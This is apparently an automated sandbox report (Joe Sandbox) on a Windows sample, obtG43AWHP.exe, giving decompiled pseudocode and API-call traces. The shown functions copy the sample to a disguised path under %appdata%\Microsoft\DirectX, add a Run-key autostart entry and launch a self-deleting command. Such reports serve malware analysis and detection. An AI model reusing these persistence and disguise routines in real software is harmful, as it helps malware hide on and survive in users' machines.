    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0018E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0018E4B6
      • Part of subcall function 0018E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0018E0C6
      • Part of subcall function 0018E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0018E0DC
      • Part of subcall function 0018E080: CreateProcessA.KERNEL32(?,00000000), ref: 0018E1C2
      • Part of subcall function 0018E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0018E1F0
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd
    Function 0018E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0018E54C
      • Part of subcall function 0018E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0018E493
      • Part of subcall function 0018E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0018E4B6
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0018DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3412 Parent PID: 3380

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
